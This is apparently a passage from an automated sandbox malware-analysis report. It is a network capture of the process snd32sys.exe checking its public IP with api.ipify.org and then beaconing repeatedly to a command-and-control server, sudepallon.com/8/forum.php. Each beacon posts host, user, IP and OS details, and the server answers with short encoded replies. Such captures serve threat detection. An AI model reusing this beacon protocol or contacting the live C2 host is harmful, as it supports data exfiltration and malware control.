                                                                                                                                                  Data Raw: 63 0d 0a 51 41 5a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQAZJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  13192.168.2.34976777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:57.757333994 CEST6037OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:57.826961040 CEST6038INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:59 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 46 4a 51 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cFJQUARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  14192.168.2.34976877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:58.204698086 CEST6039OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:58.276258945 CEST6039INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:59 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cVZAEARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  15192.168.2.34976977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:58.606812954 CEST6040OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:58.675935984 CEST6040INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:00 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cMCXNARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  16192.168.2.34977077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:59.018161058 CEST6041OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:59.090984106 CEST6042INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:00 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNKPMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  17192.168.2.34977177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:59.415894985 CEST6043OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:59.487183094 CEST6043INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:00 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNNMMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  18192.168.2.34977277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:59.801717997 CEST6044OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:59.868599892 CEST6044INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:01 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNKPMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  19192.168.2.34977377.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:00.207560062 CEST6045OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:00.276813984 CEST6045INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:01 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cFKPUARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.34975623.21.173.15580C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:52.909492970 CEST5479OUTGET / HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: api.ipify.org
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Jul 8, 2021 16:31:53.014983892 CEST5479INHTTP/1.1 200 OK
                                                                                                                                                  Server: Cowboy
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Vary: Origin
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:52 GMT
                                                                                                                                                  Content-Length: 14
                                                                                                                                                  Via: 1.1 vegur
                                                                                                                                                  Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                                                                                                                                                  Data Ascii: 185.189.150.70


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  20192.168.2.34977477.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:00.613718033 CEST6046OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:00.681197882 CEST6046INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:02 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 41 54 47 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cATGZARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  21192.168.2.34977577.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:01.018528938 CEST6047OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:01.088430882 CEST6047INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:02 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNHSMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  22192.168.2.34977677.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:01.437737942 CEST6048OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:01.505616903 CEST6049INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:02 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cGMNTARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  23192.168.2.34977777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:01.835478067 CEST6049OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:01.903317928 CEST6050INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:03 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cCAZXARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  24192.168.2.34977877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:02.240464926 CEST6051OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:02.306262970 CEST6051INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:03 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cKAZPARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  25192.168.2.34977977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:02.637330055 CEST6052OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:02.708657980 CEST6052INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:04 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cTHSGARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  26192.168.2.34978077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:03.034343958 CEST6053OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:03.099986076 CEST6053INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:04 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cCHSXARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
